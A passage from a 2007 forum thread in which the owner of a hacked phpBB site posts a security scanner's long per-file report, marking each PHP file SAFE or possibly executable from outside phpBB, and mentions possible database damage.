file is possibly executable from beyond phpBB admin/_vti_cnf/admin_groups.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_group_extend.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_hacks_list.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_icons.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_im_log.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_im_network.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_im_users.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_ban.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_category.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_bulk_add.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_char.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_disable.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_mass.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ip_search.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_kb_cat.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_in_un.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_kb_art.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_xtras.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_jr_admin.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_cache.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_kb_types.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_links.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_layout.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_lwacctrecords.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_chmod.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_links_cat.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_news_cats.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_portal.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_list.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_mass_email.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_mod_package.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_clone.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_meta_tags.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_category.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_edit.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_news.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_fchecker.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_index.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_catauth.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_license.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_points.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_custom.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_phpinfo.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_qbar.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_file.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_settings.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pa_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_classesfields.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_tableslinked.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_userfields.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_valueslist.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_usermaps.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_phpbbmyadmin.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_rebuild_search.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_pcp_wizard.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_priv_msgs.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ranks.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_prune_users.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_rating.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_smilies.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_styles.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_referers.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_spellcheck.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_users.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_security.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_smilies_upload.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_sub_settings.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_statistics.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_stats_lang.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_subtemplates.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_styles_select.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_userlist.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_words.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_topic_shadow.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_users_inactive.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_include_import2.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_user_ban.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_user_exptime.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_wpm.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/forum_tour_links.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/download_lang.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/import_lang.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/pagestart.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/page_header_admin.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/sig_reset.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/page_footer_admin.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_download.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_edit_data.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_export_data.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_export.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_frameset.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_import.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_frame_top.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_include_import.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_install.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_styles.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_include.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_update.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/xs_uninstall.php Code in the file is possibly executable from beyond phpBB admin/admin_referers.php Code in the file is possibly executable from beyond phpBB admin/admin_smilies_upload.php SAFE admin/admin_smilies.php SAFE admin/admin_spellcheck.php Code in the file is possibly executable from beyond phpBB admin/admin_styles.php SAFE admin/admin_ug_auth.php SAFE admin/admin_statistics.php common.php / pagestart.php not included or included too late admin/sig_reset.php SAFE admin/xs_download.php SAFE admin/admin_styles_select.php SAFE admin/admin_subtemplates.php SAFE admin/admin_sub_settings.php SAFE admin/admin_topic_shadow.php Code in the file is possibly executable from beyond phpBB admin/admin_userlist.php SAFE admin/admin_users.php Code in the file is possibly executable from beyond phpBB admin/admin_users_inactive.php SAFE admin/admin_user_ban.php SAFE admin/admin_user_exptime.php SAFE admin/admin_words.php SAFE admin/-admin_wpm.php Code in the file is possibly executable from beyond phpBB admin/download_lang.php common.php / pagestart.php not included or included too late admin/forum_tour_links.php SAFE admin/import_lang.php common.php / pagestart.php not included or included too late admin/pagestart.php SAFE admin/page_footer_admin.php SAFE admin/xs_export.php SAFE admin/xs_export_data.php SAFE admin/page_header_admin.php SAFE admin/xs_edit_data.php SAFE admin/xs_frameset.php SAFE admin/xs_frame_top.php SAFE admin/xs_import.php SAFE admin/xs_include.php SAFE admin/xs_include_import.php SAFE admin/xs_include_import2.php SAFE admin/xs_install.php SAFE admin/cash_log.php Code in the file is possibly executable from beyond phpBB admin/xs_styles.php SAFE admin/xs_update.php SAFE admin/xs_uninstall.php SAFE admin/admin_album_config_clearcache.php SAFE admin/admin_album_config_clown.php SAFE admin/admin_album_config_extended.php Code in the file is possibly executable from beyond phpBB admin/admin_album_config_gd_info.php SAFE admin/admin_album_config_index.php SAFE admin/admin_album_config_personal.php SAFE admin/admin_album_config_settings.php SAFE admin/admin_album_config_thumb.php SAFE admin/admin_album_config_upload.php SAFE admin/admin_cash.php Code in the file is possibly executable from beyond phpBB admin/admin_cracker_tracker.php SAFE admin/admin_kb_auth.php Code in the file is possibly executable from beyond phpBB admin/admin_kb_custom.php Code in the file is possibly executable from beyond phpBB admin/admin_kb_rebuild_search.php Code in the file is possibly executable from beyond phpBB admin/cash_currencies.php Code in the file is possibly executable from beyond phpBB admin/cash_events.php Code in the file is possibly executable from beyond phpBB admin/cash_exchange.php Code in the file is possibly executable from beyond phpBB admin/cash_forums.php Code in the file is possibly executable from beyond phpBB admin/cash_groups.php Code in the file is possibly executable from beyond phpBB admin/cash_help.php Code in the file is possibly executable from beyond phpBB admin/cash_recount.php Code in the file is possibly executable from beyond phpBB admin/cash_reset.php Code in the file is possibly executable from beyond phpBB admin/cash_settings.php Code in the file is possibly executable from beyond phpBB activity_char.php SAFE album_edit.php common.php / pagestart.php not included or included too late album_mod/album_constants.php SAFE album_mod/album_functions.php SAFE album_mod/album_hierarchy_functions.php SAFE album_mod/clown_album_functions.php SAFE album_mod/album_bbcode.php Code in the file is possibly executable from beyond phpBB album_mod/album_acp_functions.php SAFE album_mod/album_exif_info.php common.php / pagestart.php not included or included too late album_mod/album_hierarchy_auth.php SAFE album_mod/album_hierarchy_debug.php SAFE album_mod/album_hierarchy_sql.php SAFE album_mod/album_memberlist.php SAFE album_mod/album_nuffimage.php SAFE album_mod/album_nuffimage_box.php SAFE album_mod/album_personal.php SAFE album_mod/album_watermark.php SAFE album_mod/archive.php Code in the file is possibly executable from beyond phpBB activity_favs.php common.php / pagestart.php not included or included too late activity_trophy_popup.php common.php / pagestart.php not included or included too late album.php common.php / pagestart.php not included or included too late album_cat.php common.php / pagestart.php not included or included too late album_comment.php common.php / pagestart.php not included or included too late album_comment_delete.php common.php / pagestart.php not included or included too late album_comment_edit.php common.php / pagestart.php not included or included too late album_delete.php common.php / pagestart.php not included or included too late album_upload.php common.php / pagestart.php not included or included too late Amod/funkoid/funkoid_data/_vti_cnf/level_interface.php Code in the file is possibly executable from beyond phpBB Amod/funkoid/funkoid_data/level_interface.php Code in the file is possibly executable from beyond phpBB Amod/funkoid_data/_vti_cnf/level_interface.php Code in the file is possibly executable from beyond phpBB Amod/funkoid_data/level_interface.php Code in the file is possibly executable from beyond phpBB album_hotornot.php common.php / pagestart.php not included or included too late album_modcp.php common.php / pagestart.php not included or included too late album_personal.php SAFE album_personal_index.php common.php / pagestart.php not included or included too late album_pic.php common.php / pagestart.php not included or included too late album_picm.php common.php / pagestart.php not included or included too late album_search.php common.php / pagestart.php not included or included too late album_thumbnail.php common.php / pagestart.php not included or included too late amod_files/activity_daily.php SAFE amod_files/activity_highscores.php SAFE amod_files/activity_gambling.php SAFE amod_files/activity_top_scores.php SAFE amod_files/activity_hof.php SAFE amod_files/activity_newest.php SAFE amod_files/activity_info.php SAFE amod_files/activity_online.php SAFE amod_files/activity_search.php SAFE amod_files/activity_services.php SAFE amod_files/activity_top_five.php SAFE amod_files/activity_trophy_holders.php SAFE amod_files/activity_settings.php SAFE amod_files/challenges.php SAFE amod_files/activity_top_scores_search.php SAFE amod_files/activity_whos_where.php SAFE amod_files/_vti_cnf/activity_hof.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_info.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_gambling.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_daily.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_top_scores.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_highscores.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_online.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_newest.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_search.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_settings.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_services.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_trophy_holders.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_top_five.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/challenges.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_top_scores_search.php Code in the file is possibly executable from beyond phpBB amod_files/_vti_cnf/activity_whos_where.php Code in the file is possibly executable from beyond phpBB arcade.php common.php / pagestart.php not included or included too late lgsl/index.php Code in the file is possibly executable from beyond phpBB lgsl/index_center.php Code in the file is possibly executable from beyond phpBB lgsl/index_side.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_feed.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_module.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_module_tiled.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_players.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_protocol.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_settings.php Code in the file is possibly executable from beyond phpBB lgsl/lgsl_module1.php Code in the file is possibly executable from beyond phpBB album_showpage.php Code in the file is possibly executable from beyond phpBB attach_mod/includes/functions_delete.php SAFE attach_mod/includes/constants.php SAFE attach_mod/includes/functions_admin.php SAFE attach_mod/includes/functions_includes.php SAFE attach_mod/includes/functions_attach.php SAFE attach_mod/includes/functions_thumbs.php SAFE attach_mod/includes/functions_filetypes.php Code in the file is possibly executable from beyond phpBB attach_mod/includes/functions_selects.php SAFE attach_mod/attachment_mod.php SAFE attach_mod/displaying.php SAFE attach_mod/pm_attachments.php SAFE attach_mod/posting_attachments.php SAFE archive.php Code in the file is possibly executable from beyond phpBB attach_rules.php Code in the file is possibly executable from beyond phpBB blocks/blocks_imp_album.php SAFE blocks/blocks_imp_album2.php SAFE blocks/blocks_imp_links.php SAFE blocks/blocks_imp_announcements.php SAFE blocks/blocks_imp_calendar.php SAFE blocks/blocks_imp_center_downloads.php SAFE blocks/blocks_imp_clock.php SAFE blocks/blocks_imp_chat.php SAFE blocks/blocks_imp_donate.php SAFE blocks/blocks_imp_lgsl_center.php SAFE blocks/blocks_imp_lgsl_side.php SAFE blocks/blocks_imp_online_users.php SAFE blocks/_vti_cnf/blocks_imp_announcements.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_album.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_album2.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_calendar.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_chat.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_clock.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_center_downloads.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_lgsl_side.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_donate.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_online_users.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_lgsl_center.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_links.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_menu.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_newest_pic.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_online_users2.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_news.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_poll.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_random_attach.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_style_select.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_recent_topics.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_referers.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_search.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_security.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_sec_menu.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_shoutbox.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_statistics.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_topics_since.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_users_visited.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_user_block.php Code in the file is possibly executable from beyond phpBB blocks/_vti_cnf/blocks_imp_visit_counter.php Code in the file is possibly executable from beyond phpBB blocks/blocks_imp_menu.php SAFE blocks/blocks_imp_newest_pic.php SAFE blocks/blocks_imp_news.php SAFE blocks/blocks_imp_search.php SAFE blocks/blocks_imp_online_users2.php SAFE blocks/blocks_imp_poll.php SAFE blocks/blocks_imp_random_attach.php SAFE blocks/blocks_imp_recent_topics.php SAFE blocks/blocks_imp_referers.php SAFE blocks/blocks_imp_statistics.php SAFE blocks/blocks_imp_sec_menu.php SAFE blocks/blocks_imp_shoutbox.php SAFE blocks/blocks_imp_security.php SAFE blocks/blocks_imp_style_select.php SAFE blocks/blocks_imp_topics_since.php SAFE blocks/blocks_imp_users_visited.php SAFE blocks/blocks_imp_visit_counter.php SAFE blocks/blocks_imp_user_block.php SAFE chatspot/chatspot_title.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_about.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_db.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_help.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_functions.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_drop.php Code in the file is possibly executable from beyond phpBB chatspot/chatspot_rooms.php Code in the file is possibly executable from beyond phpBB chatspot/user_invite.php Code in the file is possibly executable from beyond phpBB chatspot/clear_window.php Code in the file is possibly executable from beyond phpBB chatspot/java.script.php Code in the file is possibly executable from beyond phpBB chatspot/message_control.php Code in the file is possibly executable from beyond phpBB chatspot/message_send.php Code in the file is possibly executable from beyond phpBB chatspot/message_interpreter.php Code in the file is possibly executable from beyond phpBB chatspot/room_manager.php Code in the file is possibly executable from beyond phpBB chatspot_front.php Code in the file is possibly executable from beyond phpBB calendar.php Code in the file is possibly executable from beyond phpBB calendar_scheduler.php SAFE faq.php SAFE chatbox_front.php SAFE contact.php Code in the file is possibly executable from beyond phpBB delete_users.php Code in the file is possibly executable from beyond phpBB desktop.php Code in the file is possibly executable from beyond phpBB dload.php Code in the file is possibly executable from beyond phpBB download.php Code in the file is possibly executable from beyond phpBB errors.php common.php / pagestart.php not included or included too late files/index.php Code in the file is possibly executable from beyond phpBB game.php SAFE game_data/funkoid_data/_vti_cnf/level_interface.php Code in the file is possibly executable from beyond phpBB game_data/funkoid_data/level_interface.php Code in the file is possibly executable from beyond phpBB export.php SAFE fetchposts.php SAFE game_root/funkoid_data/_vti_cnf/level_interface.php Code in the file is possibly executable from beyond phpBB game_root/funkoid_data/level_interface.php Code in the file is possibly executable from beyond phpBB imclient.php common.php / pagestart.php not included or included too late groupcp.php SAFE includes/archive/archive_forum.php Code in the file is possibly executable from beyond phpBB includes/archive/archive_functions.php SAFE includes/archive/archive_index.php Code in the file is possibly executable from beyond phpBB includes/archive/archive_page_header.php SAFE includes/archive/archive_page_tail.php SAFE includes/archive/archive_topic.php Code in the file is possibly executable from beyond phpBB includes/auth.php SAFE includes/bbcode.php SAFE includes/-page_header.php SAFE includes/constants.php Code in the file is possibly executable from beyond phpBB includes/-constants.php Code in the file is possibly executable from beyond phpBB includes/constants_prillian.php SAFE includes/db.php SAFE includes/def_auth.php SAFE includes/def_birthday.php SAFE includes/constants_contact.php SAFE includes/def_ranks.php SAFE includes/def_smilies.php SAFE includes/def_icons.php SAFE includes/def_words.php SAFE includes/emailer.php Code in the file is possibly executable from beyond phpBB includes/def_qbar.php SAFE includes/def_themes.php SAFE includes/functions.php Code in the file is possibly executable from beyond phpBB includes/functions_admin.php SAFE includes/def_tree.php SAFE includes/functions_dbmtnc.php SAFE includes/functions_kb.php SAFE includes/functions_admin_qbar.php SAFE includes/functions_admin_pcp.php SAFE includes/functions_amod_plus.php Code in the file is possibly executable from beyond phpBB includes/functions_amod_plusC.php Code in the file is possibly executable from beyond phpBB includes/functions_amod_plus_char.php SAFE includes/functions_announces.php SAFE includes/functions_calendar.php SAFE includes/functions_bookmark.php SAFE includes/functions_ftr.php SAFE includes/functions_categories_hierarchy.php SAFE includes/functions_kb_mx.php SAFE includes/lite.php SAFE includes/functions_digests.php Code in the file is possibly executable from beyond phpBB includes/functions_hacks_list.php SAFE includes/functions_jr_admin.php Code in the file is possibly executable from beyond phpBB includes/news.php SAFE includes/functions_mods_settings.php SAFE includes/functions_points.php SAFE includes/functions_post.php SAFE includes/functions_portal.php Code in the file is possibly executable from beyond phpBB includes/functions_qbar.php SAFE includes/functions_search.php SAFE includes/functions_selects.php SAFE includes/functions_topics_list.php SAFE includes/functions_validate.php SAFE includes/group_extend_auth.php SAFE includes/kb_add.php SAFE includes/kb_article.php SAFE includes/kb_cat.php SAFE includes/kb_constants.php SAFE includes/kb_edit.php SAFE includes/kb_header.php SAFE includes/kb_footer.php SAFE includes/kb_rate.php SAFE includes/functions_cash.php SAFE includes/kb_moderator.php SAFE includes/kb_stats.php SAFE includes/lw_ipn_grp_functions.php SAFE includes/prune.php SAFE includes/mods_settings/mod_profile_control_panel.php SAFE includes/mods_settings/mod_announces.php SAFE includes/mods_settings/mod_calendar.php SAFE includes/mods_settings/mod_categories_hierarchy.php SAFE includes/mods_settings/mod_last_topics_from.php SAFE includes/mods_settings/mod_split_topic_type.php SAFE includes/news_data.php Code in the file is possibly executable from beyond phpBB includes/optimize_database_cron.php SAFE includes/-functions.php Code in the file is possibly executable from beyond phpBB includes/page_header_printer.php SAFE includes/page_tail.php SAFE includes/phpbb_security.php SAFE includes/pseudocron.php SAFE includes/smtp.php SAFE includes/rewards_api.php Code in the file is possibly executable from beyond phpBB includes/sessions.php SAFE includes/sql_parse.php SAFE includes/template.php Code in the file is possibly executable from beyond phpBB includes/topic_review.php SAFE includes/usercp_activate.php SAFE includes/usercp_avatar.php SAFE includes/usercp_confirm.php SAFE includes/usercp_email.php SAFE includes/usercp_profile.php SAFE includes/usercp_register.php Code in the file is possibly executable from beyond phpBB includes/usercp_sendpasswd.php SAFE includes/usercp_viewprofile.php SAFE includes/classes_cash.php SAFE includes/functions_last_topics_from.php SAFE includes/functions_kb_auth.php Code in the file is possibly executable from beyond phpBB includes/functions_kb_field.php SAFE includes/kb_post.php SAFE includes/page_header.php SAFE includes/1def_qbar.php SAFE includes/usercp_confirm_gd.php SAFE  

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 5:47 pm
Author: Leadfoot
hmm guess i hit the character limit in a post. here is the rest. It also seems that all the links in my photo album are messed and am getting errors still there that i have to check. So I am not sure how much db damage there is

mods/contact/functions_contact.php SAFE
mods/contact/class_contact.php Code in the file is possibly executable from beyond phpBB
mods/contact/contactcp_edit.php SAFE
mods/contact/contactcp_listbox.php SAFE
mods/contact/contactcp_show.php SAFE
mods/netclectic/mini_cal/mini_cal2.php SAFE
mods/netclectic/mini_cal/calendarSuite.php Code in the file is possibly executable from beyond phpBB
mods/netclectic/mini_cal/mini_cal.php SAFE
mods/netclectic/mini_cal/mini_cal_TOPIC.php Code in the file is possibly executable from beyond phpBB
mods/prillian/network_receive.php SAFE
mods/prillian/functions_im.php SAFE
mods/prillian/im_log.php SAFE
mods/prillian/im_main.php SAFE
mods/prillian/im_read.php SAFE
mods/prillian/im_send.php SAFE
mods/prillian/network_parseusers.php SAFE
mods/prillian/network_users.php SAFE
mods/prillian/prill_footer.php SAFE
mods/prillian/prill_header.php SAFE
mods/prillian/usercp_imprefs.php SAFE
mods/rating/functions_rating.php SAFE
mods/rating/functions_rating_2.php SAFE
index.php SAFE
kb_search.php Code in the file is possibly executable from beyond phpBB
modules/admin_statistics/module.php SAFE
modules/most_active_topics/module.php SAFE
modules/most_active_topicstarter/module.php SAFE
modules/most_viewed_topics/module.php SAFE
modules/posts_by_month/module.php SAFE
modules/stats_overview/module.php SAFE
modules/topics_by_month/module.php SAFE
modules/top_attachments/module.php SAFE
modules/top_posters/module.php SAFE
modules/top_posters_month/module.php SAFE
modules/top_posters_week/module.php SAFE
modules/top_smilies/module.php SAFE
modules/users_by_month/module.php SAFE
mycookies.php SAFE
links.php common.php / pagestart.php not included or included too late
link_register.php Code in the file is possibly executable from beyond phpBB
login.php SAFE
login_security.php common.php / pagestart.php not included or included too late
lwacctrecords.php SAFE
lwdonate.php SAFE
lwdonateconfirm.php SAFE
lwdonateresult.php SAFE
lwdonateshowresult.php SAFE
lwdonors.php SAFE
lwtopup.php SAFE
lwtopupresult.php SAFE
lwtopupshowresult.php SAFE
lwupdateusersub.php SAFE
mail_digests.php Code in the file is possibly executable from beyond phpBB
memberlist.php SAFE
merge.php SAFE
modcp.php SAFE
pointscp.php SAFE
profilcp/def/def_userfuncs_viewonline.php SAFE
profilcp/def/def_userfields.php SAFE
profilcp/def/def_usermaps.php SAFE
profilcp/def/def_userfields_phpbb.php SAFE
profilcp/def/def_userfuncs.php SAFE
profilcp/def/def_userfuncs_album.php SAFE
profilcp/def/def_userfuncs_bhere.php An undefined case occurred during scanning
profilcp/def/def_userfuncs_cash.php SAFE
profilcp/def/def_userfuncs_skype.php SAFE
profilcp/def/def_userfuncs_warning.php SAFE
profilcp/def/def_userfuncs_std.php SAFE
profilcp/def/def_userfuncs_custom.php SAFE
profilcp/def/def_userfuncs_vlist.php SAFE
profilcp/profilcp_profil_digests.php SAFE
profilcp/functions_profile.php SAFE
profilcp/profilcp_activate.php Code in the file is possibly executable from beyond phpBB
profilcp/profilcp_buddy.php SAFE
profilcp/profilcp_email.php Code in the file is possibly executable from beyond phpBB
profilcp/profilcp_home.php SAFE
profilcp/profilcp_home_buddy.php SAFE
profilcp/profilcp_home_last_topics.php SAFE
profilcp/profilcp_home_privmsgs.php SAFE
profilcp/profilcp_home_wtopics.php SAFE
profilcp/profilcp_privmsg_popup.php Code in the file is possibly executable from beyond phpBB
profilcp/profilcp_privmsg.php SAFE
profilcp/profilcp_public_groups.php SAFE
profilcp/profilcp_profil_avatar.php SAFE
profilcp/profilcp_uacp.php SAFE
profilcp/profilcp_public_base.php SAFE
profilcp/profilcp_public_last_topics.php SAFE
profilcp/profilcp_sendpassword.php Code in the file is possibly executable from beyond phpBB
profilcp/profilcp_profil_photo.php SAFE
profilcp/profilcp_profil_signature.php SAFE
newscore.php Code in the file is possibly executable from beyond phpBB
news_rss.php common.php / pagestart.php not included or included too late
postings_popup.php SAFE
portal.php common.php / pagestart.php not included or included too late
profile_birthday.php SAFE
profile_pic.php SAFE
posting.php Code in the file is possibly executable from beyond phpBB
privmsg.php Code in the file is possibly executable from beyond phpBB
profile.php Code in the file is possibly executable from beyond phpBB
ranks.php Code in the file is possibly executable from beyond phpBB
rating.php SAFE
profile_avatar.php SAFE
ratings.php SAFE
shoutbox_view.php common.php / pagestart.php not included or included too late
show_post.php SAFE
rating_bias.php SAFE
redirect.php common.php / pagestart.php not included or included too late
reflog.php Code in the file is possibly executable from beyond phpBB
sql.php Code in the file is possibly executable from beyond phpBB
rules.php SAFE
shoutbox.php SAFE
signature.php SAFE
sitetosite.php Code in the file is possibly executable from beyond phpBB
shoutbox_max.php Code in the file is possibly executable from beyond phpBB
spelling/spellcheck.php Code in the file is possibly executable from beyond phpBB
spelling/spell_admin.php Code in the file is possibly executable from beyond phpBB
spelling/spell_Deutsch.php Code in the file is possibly executable from beyond phpBB
spelling/spell_diags.php Code in the file is possibly executable from beyond phpBB
spelling/spell_English.php Code in the file is possibly executable from beyond phpBB
spelling/spell_Francais.php Code in the file is possibly executable from beyond phpBB
spelling/spell_langtemplate.php Code in the file is possibly executable from beyond phpBB
spelling/spell_MySQL.php Code in the file is possibly executable from beyond phpBB
